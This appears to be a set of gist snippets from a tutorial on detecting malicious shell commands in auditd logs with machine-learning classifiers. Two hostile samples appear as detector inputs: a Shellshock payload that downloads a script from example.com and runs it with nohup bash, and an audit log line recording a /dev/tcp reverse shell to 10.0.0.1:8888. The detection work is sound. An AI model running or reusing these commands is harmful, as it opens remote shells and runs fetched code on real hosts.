This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def normalizeStringHash(string):
    """Replace hex digests embedded in *string* with fixed placeholders.

    Standalone runs of exactly 64, 40 or 32 hexadecimal characters are
    replaced by ``<sha256>``, ``<sha1>`` and ``<md5>`` respectively.

    A run only counts when it is not directly preceded or followed by
    another hex character. Without that boundary a longer hex run would be
    partially rewritten (e.g. a 128-character digest would turn into
    ``<sha256><sha256>`` and a 33-character run into ``<md5>`` plus one
    stray character).

    Args:
        string: Text to normalize.

    Returns:
        The text with every matching digest replaced by its placeholder.
    """
    hex_char = "[0-9a-fA-F]"
    # Longest first, mirroring the original order of substitutions.
    digests = ((64, "<sha256>"), (40, "<sha1>"), (32, "<md5>"))
    for length, placeholder in digests:
        pattern = (
            rf"(?<!{hex_char})"        # no hex character right before
            rf"{hex_char}{{{length}}}"  # exactly `length` hex characters
            rf"(?!{hex_char})"         # no hex character right after
        )
        string = re.sub(pattern, placeholder, string)
    return string
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
model.zero_grad() # Reset gradients tensors | |
for i, (inputs, labels) in enumerate(training_set): | |
predictions = model(inputs) # Forward pass | |
loss = loss_function(predictions, labels) # Compute loss function | |
loss = loss / accumulation_steps # Normalize our loss (if averaged) | |
loss.backward() # Backward pass | |
if (i+1) % accumulation_steps == 0: # Wait for several backward steps | |
optimizer.step() # Now we can do an optimizer step | |
model.zero_grad() # Reset gradients tensors | |
if (i+1) % evaluation_steps == 0: # Evaluate the model when we... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sklearn.neural_network import MLPClassifier | |
# NOTE(review): `[...]` looks like a stand-in for the real feature matrix and
# label vector — substitute actual data before running.
X_full_dataset = [...]
y_full_dataset = [...]

# hidden_layer_sizes lists the neuron count of each hidden layer in order.
mlpModel = MLPClassifier(
    hidden_layer_sizes=(128, 64),
)
# Fit on the dataset variables defined above (the previous call referenced
# the undefined names `full_dataset` and `y`).
mlpModel.fit(X_full_dataset, y_full_dataset)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sklearn.metrics import roc_curve, det_curve | |
def get_threshold_from_rate(thresholds, rate_array, rate):
    """Return the threshold at the first position where the rate reaches *rate*.

    Args:
        thresholds: Indexable sequence of thresholds, aligned with
            ``rate_array``.
        rate_array: Array-like of rates; presumably one of the arrays
            returned by ``roc_curve`` / ``det_curve`` — confirm against caller.
        rate: Target rate; the first entry of ``rate_array`` that is
            ``>= rate`` selects the threshold.

    Returns:
        ``thresholds[i]`` where ``i`` is the first index with
        ``rate_array[i] >= rate``.

    Raises:
        IndexError: If no entry of ``rate_array`` is ``>= rate``.
    """
    # asarray lets plain lists/tuples be compared element-wise as well.
    reached = np.nonzero(np.asarray(rate_array) >= rate)[0]
    if reached.size == 0:
        raise IndexError(
            f"no entry in rate_array is >= the requested rate {rate!r}"
        )
    return thresholds[reached[0]]
def get_value_from_threshold(values, thresholds, threshold): | |
try: | |
thr_index = np.where(thresholds <= threshold)[0][0] | |
except IndexError: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from xgboost import XGBClassifier | |
xgb_model = XGBClassifier(n_estimators=100, use_label_encoder=False, eval_metric="logloss") | |
xgb_model.fit( | |
X["HashingVectorizer"], y | |
) | |
shellshock_backdoor = "() { :;}; /bin/bash -c 'curl -O /tmp/foo.sh example.com/test; nohup bash /tmp/foo.sh &'" | |
print(xgb_model.predict_proba( | |
hvwpt.transform([shellshock_backdoor]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sklearn.model_selection import cross_validate | |
from sklearn.model_selection import StratifiedKFold | |
def print_scores(cv):
    """Print the mean of every ``test_*`` entry in *cv*, then a blank line.

    Args:
        cv: Mapping of score name to a sequence of per-fold values
            (presumably the dict returned by ``cross_validate`` — confirm
            against caller). Only keys starting with ``"test_"`` are
            reported; all other entries are ignored and never averaged, so
            an empty mapping or non-numeric extra entries do not raise.
    """
    prefix = "test_"
    for name, fold_values in cv.items():
        if not name.startswith(prefix):
            continue
        # Slice the prefix off: str.strip("test_") removes a *set of
        # characters* from both ends and would mangle names such as
        # "neg_log_loss" into "neg_log_lo".
        metric = name[len(prefix):]
        print(f"\tAverage {metric:<10} over all folds: {np.mean(fold_values):.2f}")
    print()
cv = {} | |
metrics = ["accuracy", "precision", "recall", "f1", "roc_auc"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
type=EXECVE msg=audit(1648469217.476:296): argc=2 a0="readlink" a1="/usr/bin/python" | |
type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.*=.*ubuntu" a3="/etc/os-release" | |
type=EXECVE msg=audit(1648469217.512:299): argc=3 a0="tput" a1="setaf" a2="1" | |
type=EXECVE msg=audit(1648469218.312:300): argc=4 a0="/bin/sh" a1="-c" a3="/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261" | |
type=EXECVE msg=audit(1648469219.440:302): argc=3 a0="/usr/lib/x86_64-linux-gnu/utempter/utempter" a1="add" a2="tmux(3353).%1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re | |
from nltk.tokenize import WordPunctTokenizer | |
from sklearn.feature_extraction.text import HashingVectorizer | |
wpt = WordPunctTokenizer() | |
hvwpt = HashingVectorizer( | |
preprocessor=lambda x: re.sub(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", "_IPADDRESS_", x), | |
tokenizer=wpt.tokenize, | |
token_pattern=None, | |
lowercase=False, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"program_name": "auditbeat", | |
"hostname": "k8s-minikube", | |
"...", | |
"auditd": { | |
"message_type": "syscall", | |
"summary": { | |
"actor": { | |
"primary": "root", | |
"secondary": "root" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
import string | |
import time | |
def get_random_ip(octets=4):
    """Return a random dotted-decimal address string.

    Args:
        octets: Number of dot-separated components to generate.

    Returns:
        ``octets`` random integers, each in the inclusive range 0-255,
        joined with ``"."``. An ``octets`` of 0 yields an empty string.
    """
    return ".".join(str(random.randint(0, 255)) for _ in range(octets))
def get_random_string(length=10):
    """Return a random string of lowercase ASCII letters and digits.

    Args:
        length: Number of characters to generate.

    Returns:
        A string of ``length`` characters, each drawn independently with
        ``random.choice``. A ``length`` of 0 yields an empty string.
    """
    # Build the alphabet once instead of re-concatenating it per character.
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))
Newer Older